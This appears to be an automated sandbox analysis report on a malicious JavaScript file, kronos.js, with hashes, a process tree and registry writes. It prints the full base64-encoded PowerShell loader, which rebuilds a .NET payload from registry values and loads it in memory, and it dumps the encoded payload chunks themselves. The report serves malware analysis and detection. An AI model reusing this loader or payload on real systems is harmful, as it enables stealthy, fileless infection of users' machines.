File name:

kronos.js

Full analysis: https://app.any.run/tasks/408db7df-2c3d-466e-b745-f704a1b2daa3
Verdict: Malicious activity
Analysis date: January 08, 2021, 17:34:05
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines, with no line terminators
MD5:

BD52C3FCB98700992066743B021876DD

SHA1:

C711676CF2DADFFA73B3BD03DE01FC3E6EA4E892

SHA256:

A0081F88E43338810FE23BD2E1FBA8857B45F4378DF38FC0C217426468B924FC

SSDEEP:

768:d7CMeEg04yt6FXjegX0Z62vdg+wYR9zECQsIuh3+7Ele3UfZ0l0jLqx15FUaHMyh:dxztA1GVMA5l0PrF06

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 2660)

  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3544)

    • Starts CMD.EXE for commands execution

      • WScript.exe (PID: 2220)

  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
3
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start wscript.exe no specs cmd.exe no specs powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2220"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\kronos.js"C:\Windows\System32\WScript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
2660"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -En "PAAjACAAbwBmAHEAZgBzAGcAZAAgACMAPgAkAHUAPQAkAGUAbgB2ADoAVQBzAGUAcgBOAGEAbQBlADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgADcAMAAwADsAJABpACsAKwApAHsAJABjAD0AIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXAAiACsAJAB1ACsAIgAxACIAOwBUAHIAeQB7ACQAYQA9ACQAYQArACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AcABhAHQAaAAgACQAYwApAC4AJABpAH0AQwBhAHQAYwBoAHsAfQB9ADsAZgB1AG4AYwB0AGkAbwBuACAAYwBoAGIAYQB7AFsAYwBtAGQAbABlAHQAYgBpAG4AZABpAG4AZwAoACkAXQBwAGEAcgBhAG0AKABbAHAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUAKQBdAFsAUwB0AHIAaQBuAGcAXQAkAGgAcwApADsAJABCAHkAdABlAHMAIAA9ACAAWwBiAHkAdABlAFsAXQBdADoAOgBuAGUAdwAoACQAaABzAC4ATABlAG4AZwB0AGgAIAAvACAAMgApADsAZgBvAHIAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAaABzAC4ATABlAG4AZwB0AGgAOwAgACQAaQArAD0AMgApAHsAJABCAHkAdABlAHMAWwAkAGkALwAyAF0AIAA9ACAAWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAHkAdABlACgAJABoAHMALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAaQAsACAAMgApACwAIAAxADYAKQB9ACQAQgB5AHQAZQBzAH0AOwAkAGkAIAA9ACAAMAA7AFcAaABpAGwAZQAgACgAJABUAHIAdQBlACkAewAkAGkAKwArADsAJABrAG8AIAA9ACAAWwBtAGEAdABoAF0AOgA6AFMAcQByAHQAKAAkAGkAKQA7AGkAZgAgACgAJABrAG8AIAAtAGUAcQAgADEAMAAwADAAKQB7ACAAYgByAGUAYQBrAH0AfQBbAGIAeQB0AGUAWwBdAF0AJABiACAAPQAgAGMAaABiAGEAKAAkAGEALgByAGUAcABsAGEAYwBlACgAIgAjACIALAAkAGsAbwApACkAOwBbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgApADsAWwBNAG8AZABlAF0AOgA6AFMAZQB0AHUAcAAoACkAOwA= "C:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
3544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -En "PAAjACAAbwBmAHEAZgBzAGcAZAAgACMAPgAkAHUAPQAkAGUAbgB2ADoAVQBzAGUAcgBOAGEAbQBlADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgADcAMAAwADsAJABpACsAKwApAHsAJABjAD0AIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXAAiACsAJAB1ACsAIgAxACIAOwBUAHIAeQB7ACQAYQA9ACQAYQArACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AcABhAHQAaAAgACQAYwApAC4AJABpAH0AQwBhAHQAYwBoAHsAfQB9ADsAZgB1AG4AYwB0AGkAbwBuACAAYwBoAGIAYQB7AFsAYwBtAGQAbABlAHQAYgBpAG4AZABpAG4AZwAoACkAXQBwAGEAcgBhAG0AKABbAHAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUAKQBdAFsAUwB0AHIAaQBuAGcAXQAkAGgAcwApADsAJABCAHkAdABlAHMAIAA9ACAAWwBiAHkAdABlAFsAXQBdADoAOgBuAGUAdwAoACQAaABzAC4ATABlAG4AZwB0AGgAIAAvACAAMgApADsAZgBvAHIAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAaABzAC4ATABlAG4AZwB0AGgAOwAgACQAaQArAD0AMgApAHsAJABCAHkAdABlAHMAWwAkAGkALwAyAF0AIAA9ACAAWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAHkAdABlACgAJABoAHMALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAaQAsACAAMgApACwAIAAxADYAKQB9ACQAQgB5AHQAZQBzAH0AOwAkAGkAIAA9ACAAMAA7AFcAaABpAGwAZQAgACgAJABUAHIAdQBlACkAewAkAGkAKwArADsAJABrAG8AIAA9ACAAWwBtAGEAdABoAF0AOgA6AFMAcQByAHQAKAAkAGkAKQA7AGkAZgAgACgAJABrAG8AIAAtAGUAcQAgADEAMAAwADAAKQB7ACAAYgByAGUAYQBrAH0AfQBbAGIAeQB0AGUAWwBdAF0AJABiACAAPQAgAGMAaABiAGEAKAAkAGEALgByAGUAcABsAGEAYwBlACgAIgAjACIALAAkAGsAbwApACkAOwBbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgApADsAWwBNAG8AZABlAF0AOgA6AFMAZQB0AHUAcAAoACkAOwA= "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
Total events
1 691
Read events
972
Write events
719
Delete events
0

Modification events

(PID) Process:(2220) WScript.exeKey:HKEY_CURRENT_USER\Software\admin
Operation:writeName:(default)
Value:
(PID) Process:(2220) WScript.exeKey:HKEY_CURRENT_USER\Software\admin
Operation:writeName:0
Value:
yduasqvtqqvyqqffffqvbpqqqqvvyqqqqqqqqqqqqqqqqqqqqqqqvvpqqvvewfbavevvbyvscdrwbpvwyccdrwuyipisotrvovorifiooriwidrvitiwieieifoyrviriurvorouiervisiervyyyfutrvidifiyiurevdvdvaryqqqqvvuvyuqvycvwvtvvriiefoufqqqqqveqvrrwvbvwvbqvaewyqvviqqqqeecdwyqvrqqvevwyqqvvwqrqqvvrqvvyqqqqqyqqqqqvrvwuqvvrqqqqvtvvyvpuqvwqvvwqqqwqvvwqqqqvwqqqqqqqvvspcdwyvvutqqvvevwyvvapvrqqqqqqqqqqqqqvwuqcqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqvvrqqpqqqqqqqvvprqvvypqqqqqqqvreoyiuopoyqqfyadwyqvrqqvaewyqvvrqqqqqqqqqvrqvvivreorotoritqqapvrqqevwyqvvyqqbvwyqqqqqqqqvvyqvvyvreoriuicifitqvvcqqqvwuqvvrqqbywyqqqqqqqqvvyqvvyrqqqqqqqqqqvvdvcdwyqqqvypqqvrquvvtyriqviyaowyqtqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqvvwevrrpvuqvvarawttvvrqbqqvwqvwwvrwpudwifevwvarbqiravvwttvvtvvwsqqvrqvwwvrobwsqvvyvtwpifvoqvvawfwvrpvpqvvavarbqiraqqwttvvtvvueqqvtqvwwottrqvvivavivrodwsqvvyvvwiviobwsqvvyifvsqvvarpvaqvvaoevwqvvyrdwtwyfevivyqvviotvbqvvapvvwqvvyrbvvoevwqvvyrpvwqvrbvifevittqvviotvdqvvarpvrqvrbrpvtqvrbvbrbqoraqvwttvvtvvibqqvyqvwwvvwivartqqqqqvvbrbriqiwoupvaviicrpwqqavbvortqqqvyvpfyvfevwwifevwwtvuwwvurdvtvvrbvivvwowtvurbduorvwqvovvcvporpcpewyovwrvwrpwwqvvaifwrqvvarpvwqvvivdvsrpvpqvvivvorsvpewyovwtvyrbvvwwvyrawevrrpvuqvvaravvwttvvrvvrpqqvuqvwwqfvvrpvuqvvivfvwrpviqvvidvvtqvwbrpwyqvvarpwuqvvaauvtqvwbvarbqirawbtvvbvvoavtqvviqvwwvvwivatpiyvtqqwivbwrvrfewuvfqvvrwrvtfewuveqvvrwrvrdvvfqvvrrpwyqvvarpwiqvvarpwoqvvaodwqqyvvoevbqvvyorsapewyovorwppfwyovoewpqvvaoewpqvvawirvvyqvvpoewpqvvawywrvrwrvtifrfqvviwtwiwwwirdviotwsqvvaoavrwftcrpwaqvvawtvyvrwwvywftyuprpwaqvvawtvurvbtqqpdwcqvvwwtviwwviwirvvrqwvvserpwbqvvawafevwwifevwwtwiwwwirdrtvvoeviqvvywrvtobvdqvvywwviifwbqvviwtwiwwwirdviotwsqvvaoavvrbrwvvoevuqvvywrvtobvdqvvywwviifwoqvviwtwiwwwirdviotwsqvvaoavvwwviwfrssywtvowiwtvpoevsqvvywrvtobvcqvvywwvoweupwrvpwawrvwifroqvviwtwiwwwirdviotwsqvvaoawwvuwwvpfevwwifevwwtwiwwwirdrroevaqvvywrvtobvcqvvywwvpifrbqvviwifevwwtwiwwwirdviotwsqvvaoavrwwvywfuvuprpwaqvvawtvsvrwwvywfuyuprpwaqvvawtvawiwtvboevoqvvywrvtobvcqvvywwvuwwvsrqtqvvwfyvifwfqvviwtvcwwvcwifevwwifevwwtwiwwwirdviotwsqvvaoaoevpqvvywrvtobvcqvvywwvcvrwwvawrvwifrtqvviwtwiwwwirdviotwsqvvaoawwvyrvfpqqupwtvdvrwwvywcuprpwcqvvawtvewiwtvftppiqqqrwwvdwfvcuprpwaqvvawtwvvrwwvdwfwvuprpwaqvvawtwwvrwwvdwfwyuprpwaqvvawtwrwwwwwifevwwtwiwwwirdyuvvwwwwpdwdqvvwwtwtvrwwwrwwwtwiwwwtpeisrpwdqvvavvoevpqvvywrvtobvcqvvywwvcwwwvupwwwtwwwtpeiswrvwifrtqvviwtwiwwwirdviotwsqvvaoavvwwvdwfrpupwtvdvvwwvfwoupwtvfwwvfwwvefevywtwiwwwitaibffffffwwvcrpweqvvawtwyoevpqvvywrvtobvcqvvywwvoweupwwwywawrvwifrtqvviwtwiwwwirdviotwsqvvaoavrwwvywfrpuprpwaqvvawtwuwwvbwifevwwtwiwwwirdvywwvuwtvcwwviwfrcwwvcwwwuupserpwbqvvawafevwwifevwwtwiwwwirdrtvvoevyqvvywrvtobvdqvvywwviifwtqvviwtwiwwwirdviotwsqvvaoavvrbrwvvoevtqvvywrvtobvdqvvywwviifvfqvviwtwiwwwirdviotwsqvvaoavvoevrqvvywrvtobvdqvvyifvbqvviwufevwwifevwwtwiwwwirdviotwsqvvaoavvdewbrivvwrvtobveqvvyrpwfqvvarprqqaifrwqvvavvdevtvvrbwrqiwoupvaviwbfevywtwiwwwitapffcffffraqvywwcqqqqtiqqwtvtqvysvtqvwbqqvwqvvwvttvvrvvcsqqqqvvorwapfwyovorrcpfwyovrpvyqvrbpvvrqvvyorwapfwyovoryipfwyovrpvuqvrbpvvtqvvyorwapfwyovororpfwyovrpviqvrbpvvyqvvyorwapfwyovorsypfwyovrpvoqvrbpvvuqvvyorwapfwyovorcvpfwyovrpvpqvrbpvviqvvyorwapfwyovorerpfwyovrpvsqvrbpvvoqvvyorwapfwyovorvvsvwyovrpvaqvrbpvvpqvvyorwapfwyovorrisvwyovrpvbqvrbpvvsqvvyoryasvwyovoruisvwyovrpvcqvrbpvvaqvvyorwapfwyovorpvsvwyovrpvdqvrbpvvbqvvyraqqyrutyayrvwqwqqqvvcqqoityretvretttvtttwtsqqquvvicqqbpvaqvrtoeqvryvbqvwpvpqvrtutoyorisieiootqqvvtcwtqvavsvwyvvrtuuutvvdcatwyvvwqqvrtyouuysyyqqecatwyvvopvtqvrtyricifirqqqqqrqvvwuofuvrwcvsveqqfaruttvvwiqvvwqqrtqqwqqvwsqqttqqppqqrtqqviqqvtqqvwqqvrqqviqqvwqqvtqqvrqqvwqqvtqqveqqvwqqvdqqqvvaqwqqqvvivvufvwupvwvivviivwupvwvivvopvwupvwvivvswvrupvwvivvsevrupvwvivvivvtywvtvivvotvtywvtvivvdpvybcvyvivvfyvybcvyvivvrtvuvtvuvivvytvuvtvuvivvafvuupvwvivvddvuvtvuvivvfpvuupvwviqsviupvwvavvtbvirfvivivviwviyivivivvpaviupvwvivvsyviupvwvivvacviywvtvivvcpviupvwvivvcdviupvwvivvfwviywvtvivvfsviupvwvivvtvvoupvwvivvtcvoupvwvivvyivoupvwvivvubvoupvwvivvorvoupvwvivvoovoupvwvivvoevoupvwvevvaavosovovivvcdvoywvtvivvetvoywvtvivvfevoeevoqqqwqqqvvwqw
(PID) Process:(2220) WScript.exeKey:HKEY_CURRENT_USER\Software\admin
Operation:writeName:1
Value:
qwvvwqwoqqvuqwqwvvprvwwqrtqqvuqrquqtvwqvriqqvsqcqaqtvwqvtbqqvsqcqeqtvwqvusqqvsqcvvwrqtvwqvorqqvsqcvvwiqtvwqvsqqvvsqcvvwaqtvwqvasqqvsqcvvweqtvwqvcqqvvsqcvvrrqtvwqvdbqqvsqcvvriqtvwqvfuqqvsqcvvraqtvwqvwrvwqvvsqcvvreqbvwwqrsvwqvvdqcvvtrqbvwwqtcvwqvvdvvwqtrqtvwwqiavuqvvuvvwsvvtrvvwwvvbivuuovwtwvvsfvwwpvvtwvvacvwwcvvtwvvcrvwrqtwvvdtvwryvvtwvvesvwrpvvtwvvfavwrcvvtwqsvrtqtwvvwcvrtyvvtwvvrevrtpvvtwvvytvrtcvvrivvcrvrrdvwrivvdvvrrdvwrivvddvrtvvwrwvveovrtvvwvivvfvvrtvvwrwvvfuvrttvwrwvvffvrttvwrwqovtttvwrwwvvdvttivwrwvvwrvtrdvwrwvvwcvtrdvwrwvvruvtrdvwrwvvrfvtrdvwvivvtpvtttvwsprqqqsivvprvwvaqwqyrwqqvvpivvsyvwwqvrvvobrwqqvvpiwpssvwwyqrvvuprqqqswvvsovuurvwvrqqqvpqswrvurvryqvtqqqvpqswrvufvryiqyvvpyrwqqvvswvvievrydqivvbprwqqvvsivvpvvruuqpvvucruqqvvswwpcivoievrvsqqqvvtvvpiwpssvwubqsqqqvvtvvcivwpavriwqbqqqvvtvvcivwacvriiqcqqqvvtvvcivwbpvrifqfqqqvvtvvpiwpssvwubvvwqqqqtvvcivwpavrouvvwrqqqvvtvvcivwacvrocvvwyqqqvvtvvcivwbpvrpovvwpqqqvvtvvpiwpssvwubvvwsqqqvvtvvcivwpavrouvvwbqqqvvtvvcivwacvrocvvwdqqqvvtvvcivwbpvrpovvrwqqqvvtvvpiwpssvwubvvrrqqqvvtvvcivwpavrouvvryqqqvvtvvcivwacvrocvvriqqqvvtvvcivwbpvrpovvraqqqvvtvvpiwpssvwubvvrbqqqvvtvvcivwpavrouvvrdqqqvvtvvcivwacvrocvvrfqqqvvtvvcivwbpvrpovvttqqqvvtvvpiwpssvwubvvtyqqqvvtvvcivwpavrpdvvtiqqqvvtvvcivwacvrsivvtbqqqvvtvvcivwbpvrifvvyrqqqvvtvvpiwpssvwubvvytqqqvvtvvcivwpavratvvyuqqqvvtvvcivwacvraevvyaqqqvvtvvcivwbpvrbdvvuwqqqvvtvvpiwpssvwubvvutqqqvvtvvcivwpavrcuvvuuqqqvvtvvcivwacvrdquaqqqvvtvvcivwbpvrdfvviwqqqvvtvvpiwpssvwubvviyqqqvvtvvcivwpavresvviiqqqvvtvvcivwacvrefvvipqqqvvtvvcivwbpvrifvvicqqqvvtvvpiwpssvwubvvidqqqvvtvvcivwpavrfsvvifqqqvvtvvcivwacvrvbvwosqqqvvtvvcivwbpvrrwvwpuvvuvrqqqpiwpssvwwyvvppvvovrqqqpivvodvuydvwppqqvwvvtpvtqvvwvvsuvuvvrvvwvvtcvtqvvwvvpwvtvvrvvrvvtcvtqvvwvvpavtqvvrvvpfvtqvvwvvsivtqvvwvvsevtqvvrvvpfvtqvvwvvauvtqvvwvvauvtqvvrvvacvtqvvtvvsevtqvvwvvbuvtqvvwvvsevtqvvrvvpfvtqvvwvvbcvtqvvrvvctvtqvvwvvbcvtqvvrvvctvtqvvtvvacvtqvvyvvsevtqvvwvvbuvtqvvwvvsevtqvvrvvpfvtqvvwvvbcvtqvvrvvctvtqvvwvvbcvtqvvrvvctvtqvvtvvacvtqvvyvvsevtqvvwvvbuvtqvvwvvsevtqvvrvvpfvtqvvwvvbcvtqvvrvvctvtqvvwvvbcvtqvvrvvctvtqvvtvvacvtqvvyvvsevtqvvwvvbuvtqvvwvvsevtqvvrvvpfvtqvvwvvbcvtqvvrvvctvtqvvwvvbcvtqvvrvvctvtqvvtvvacvtqvvyvvsevtqvvwvvbuvtqvvwvvsevtqvvrvvpfvtqvvwvvauvtqvvrvvcbvtqvvtvvdtvtqvvyvvdavtqvvuvvdfvtqvvwvvauvtqvvrvvcbvtqvvtvvdtvtqvvyvvdavtqvvuvvdfvtqvvivvacvtqvvovvsevtqvvwvvbuvtqvvwvvsevtqvvrvvpfvtqvvwvveovtqvvrvvefvtqvvtvvfbvtqvvyqrvyqvvuqdvyqvvwvveovtqvvrvvefvtqvvtvvfbvtqvvyqrvyqvvuqdvyqvvivvacvtqvvovvsevtqvvwqdvyqvvrvvbuvtqvvwvvsevtqvvrvvpfvtqvvwvveovtqvvrvvefvtqvvtvvfbvtqvvyqrvyqvvuvvwavyqvvwvveovtqvvrvvefvtqvvtvvfbvtqvvyqrvyqvvuvvwavyqvvivvacvtqvvovvsevtqvvwvvfbvtqvvrvvwavyqvvtvvbuvtqvvwvvsevtqvvrvvpfvtqvvwvveovtqvvrvvefvtqvvwvveovtqvvrvvefvtqvvtvvacvtqvvyvvsevtqvvwvvbuvtqvvwvvsevtqvvrvvpfvtqvvwvvryvyqvvrvvtyvyqvvtvvyvvyqvvyvvurvyqvvuvvitvyqvvivvorvyqvvovvpvvyqvvpvvpcvyqvvsvvsdvyqvvavvasvyqvvwvvryvyqvvrvvtyvyqvvtvvyvvyqvvyvvurvyqvvuvvitvyqvvivvorvyqvvovvpvvyqvvpvvpcvyqvvsvvsdvyqvvavvasvyqvvbvvacvtqvvcvvsevtqvvwvvsdvyqvvrvvasvyqvvtvvbuvtqvvwvvsuvutwvvssvwtavwywvvssvwyrvwuwvvssvwypvwusvvssvwwyqsvvssvwwyvvisvvssvwwyvvowvvffvuipvwosvvwwviievwowvvwpviopvwpwvvifviocvwvcvvssvwubvvpwvvouvipdvwwyvvssvwubvvpwvvobviafvwpwvvprviccvwswvvpfvieyvwssvvsbviwqowvvayviesvwawvvssvwfsvwasvvdfvivwvrbsqrvovpvrbsvvrvvowuvrosvvrovowbvrcsvvtovordvwdwvvssvwwyvvdsvvutvorvvrcsvviwvorovrdsvviavorbvrfwvvpyvotrvrdsvvpevotdvrosvvutvoytvrvwvwbrvoypvrvwvwcwvowyqsvwssvwayvrwsvwssvwwyvvrwvvttvvufvwrovvwbvwufvwrevvrtvvbovrrevvwbvvaevrpqttvvufvwvtvrttvvufvwvovvyvvwvbvvyvvwrpvvabvrvpqivvdivrvwqqqvveqwqqqvvfvviyvwoyvwddvwefvwwvvryfvrbfvipivwapvwfevwyvvwvbvvurvrvwvvytvwvdvvufvrvwqypqqqqqqqqqqqiwvuqvvyqqqqqqqvvwvvyfvwqqqyqqqqqqqvvwvvrtviqqqyqqqqqqqvvwvvupvwqqqtqrqyqtquqtqiqtqoqtqpqtqsqtqaqtqbqtqcqtqdqtqeqtqfqtvvwqvrqqqvvfvvoivrwsvvayvwwdvvcovwwfvvdsvwvevvorvrvevvoovrvevvocvrvevvpwvrvevvpivrvevvpbvrvevvsvvrvevvsuvrvevvsavrvevvsfvrqqtcydifiyouiciutevvoyiuotoyufiyicicreiyicicvvyyisiwioieifotoyisitotvvuvyuvvyyiuiciuioiwoyiuuriuotouidiuuyiporiuiwiyvvyyiuiciu
(PID) Process:(2220) WScript.exeKey:HKEY_CURRENT_USER\Software\admin
Operation:writeName:2
Value:
ioiwoyiuuoifootityutiuoyuyiporiuiwiyytifieoyiuopoyvvyyiuiciuioiwoyiuutiuoyuyiporiuiwiyytifieoyiuopoyvvyyiuiciuioiwoyiuuoifootityyoiuoyuyiporiuiwiyytifieoyiuopoyvvyyiuiciuioiwoyiuyoiuoyuyiporiuiwiyytifieoyiuopoyvvyyiuiciuioiwoyiuuiisoroyouiwicywicicifityuopvvyyiuiciuioiwoyiuuoorisoyiuuvorifitiuototydiuidiforosvvyyiuiciuioiwoyiuuriuiwiyuvorifitiuototydiuidiforosvvyyiuiciuioiwoyiuuaoouuieidiwovuiisiuooyfiiutiuitoyisifievvyyiuiciuioiwoyiuytoriuiwoyiuuvorifitiuototywvvuvorifitiuototysieiiiforidiwoyisifievvutoyiworoyouovysieiiiforidiwoyisifievvidotitiforicisirvvutosotoyiuidvvyfiriaiuitoyvvydouicoyisitiwotoyyyiuiciuioiwoyiuvvuiiwicouiuuyosoviuvvutoyorisieiouyifyrosoyiuywororiwosvvuyisidiuvvreitoyiforvvuriuotouidiuuyiporiuiwiyvvuoifootityutiuoyuyiporiuiwiyytifieoyiuopoyvvutiuoyuyiporiuiwiyytifieoyiuopoyvvuoifootityyoiuoyuyiporiuiwiyytifieoyiuopoyvvyoiuoyuyiporiuiwiyytifieoyiuopoyvvuiisoroyouiwicywicicifityuopvvuoorisoyiuuvorifitiuototydiuidiforosvvuriuiwiyuvorifitiuototydiuidiforosvvuaoouuieidiwovuiisiuooyfiiutiuitoyisifievvytoriuiwoyiuuvorifitiuototywvvycifiwiyycisiroriworosywvvyoiuoyuvorifitywiyiyoriuototvvycifiwiyywovisvvytoriuiwoyiuywovisvvuyipyrybosoiyfiiiyvvysieoiifibiuvvysywotosieituriuotouicoyvvywotosieitytiwiciciriwitibvvyriuioisieysieoiifibiuvvyuieiyysieoiifibiuvvuvorifitiuototypiwieiyiciuvvuyiporiuiwiyypiwieiyiciuvvuvorifitiuototysiyvvuyiporiuiwiyysiyvvutisoaiuvvuriuotiuoroiiuiytwvvyyiuotiboyifoquyisoyiciuvvydisotitvvuriuotiuoroiiuiytrvvutoyiyysieovouoyvvutoyiyyfouoyovouoyvvutoyiyyuororiforvvipiuopvvyeiwidiuvvutosotoyiuidreurouieoyisidiureysieoyiuorifovutiuoroiisitiuotvvydiworotipiwicywotywoyoyorisirouoyiuvvuuieidiwieiwioiuiyuyosoviuvvipuvorifitiuototvvieiwidiuvvidiuoyipifiyvvoviwosicifiwiyvvifiriaiuitoyvvipiwieiyiciuvvitiwiciciriwitibvvoriuotouicoyvvoyiporiuiwiyvvitifieoyiuopoyvviwiyiyoriuototvviciuieiooyipvvoyosoviuvvovorifoyiuitoyvvovorifitiuototvviriwotiuywiyiyoriuototvvirouiiiiiuorvvirouiiiiiuorutisoaiuvvirosoyiuotuoorisoyoyiuievvirosoyiuoturiuiwiyvviwovovicisitiwoyisifieyeiwidiuvvitifididiwieiyycisieiuvvovorifitiuototywoyoyorisirouoyiuotvvoyiporiuiwiyywoyoyorisirouoyiuotvvisieipiuorisoyypiwieiyiciuotvvitoriuiwoyisifieyiiciwiootvviuieoiisorifieidiuieoyvvitouororiuieoyyyisoriuitoyiforosvvotoyiworoyouovysieiiifvvovorifitiuototysieiiiforidiwoyisifievvutosotoyiuidreutiuitouorisoyosreuviuoridisototisifieotvvutiuitouorisoyosuviuoridisototisifieywoyoyorisirouoyiuvvutiuitouorisoyosywitoyisifievvutosotoyiuidreurouieoyisidiureytifidovisiciuorutiuoroiisitiuotvvytifidovisiciwoyisifieuriuiciwopiwoyisifieotywoyoyorisirouoyiuvvurouieoyisidiuytifidoviwoyisirisicisoyosywoyoyorisirouoyiuvvoyiuotoyufiyicicvvtcteitufufyyisotoviciwosyticiwototttvvtcutoyorisieiouyifyrosoyiuywororiwosteirufuftwvvopvvtcutoyorisieiouyifyrosoyiuywororiwosteirufuftqyiouieitivtrvvytutrytctetsufufytiwitipiuiyywieifieosidifouotydiuoyipifiyyyiuiciuioiwoyiutrvvytifidovisiciuoryoiuieiuoriwoyiuiyywoyoyorisirouoyiuvvutoyorisieiovvutouirotoyorisieiovvytifieoiiuoroyvvuyifyrosoyiuvvioiuoyufyciuieiooyipvvutosotoyiuidreytiforiuvvutosotoyiuidreycisieowvvyuieouidiuoriwiriciuvvutosotoyiuidreytificiciuitoyisifieotreyoiuieiuorisitvvysyuieouidiuoriwiriciuivtwvvuriwieioiuvvuoipiuoriuvvutiuiciuitoyvvuyifywororiwosvvydiwoyipvvutoworoyvvyyifouiriciuvvuyifutoyorisieiovvuriuoviciwitiuvvyyicicysidoviforoyywoyoyorisirouoyiuvvibiuorieiuictttrvvuyosoviuvvurouieoyisidiuuyosoviuypiwieiyiciuvvyoiuoyuyosoviuyiorifidypiwieiyiciuvvydiworotipiwicvvyyiuiciuioiwoyiuvvyoiuoyyyiuiciuioiwoyiuyiiforyiouieitoyisifieuvifisieoyiuorvvutisoaiuyfiivvuyifuuysieoytttrvvysieoyuvoyorvvuaiuorifvvyuopitiuovoyisifievvyrisoyytifieoiiuoroyiuorvvuyifysieoytttrvvysieoytttrvvioiuoyufutisoaiuvvuyifysieoytwtivvyrosoyiuvvyrouiiiiiuorvvywororiwosvvyricifitibytifovosvvyoiuoyyrosoyiuotvvutosotoyiuidreyyisiwioieifotoyisitotvvuvorifitiuototvvyoiuoyuvorifitiuototyrosysiyvvybisicicvvreititoyiforvvutoyorouitoyyciwosifouoyywoyoyorisirouoyiuvvyciwosifouoyybisieiyvvutosotoyiuidreutiuitouorisoyosvvuuieoiiuorisiiisiwiriciuytifiyiuywoyoy
(PID) Process:(2220) WScript.exeKey:HKEY_CURRENT_USER\Software\admin
Operation:writeName:3
Value:
orisirouoyiuqvcvwypepotyvviyvvtuvviwvvtsvvtqtqtqtqttvvtqtqtqtqtqtqtqtyvvtqtqtqtqtqtqiivviivviivviivvtqtqtqtqirvvtpvvtqtqtqtqtqtqtqtqtqtqtqtqtqtqtyvvtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqiyvvtpvvtqtqtqtqtqtqtqiuvvtwvviivvirvviwvvtqiuvvtqtqirvvtyvvtqtsvvitvviyvvtrvvtwvvirvvtpvvtqtwvvtyvvitvvitvviyvvtrvvtwvvtuvvtyvvtivvtpvvtivvtsvvtovvttvvtrvvtqtovvtqtovvtrvvtivviivvtivvtovvtovvtrvvtivvtwvvtivviyvvtrvvtqtivvttvvtivvtwvvtivviuvvtivviuvvtivviivvtovvtyvvtrvvtqtivvtrvvtivvtuvvtrvvtqtovvtrvvtovvtuvvtivviuvvtrvvtqtivvtsvvtivviuvvtrvvtqtyvvtyvvtyvviivvtuvvttvvtrvvtqtivviyvvtivv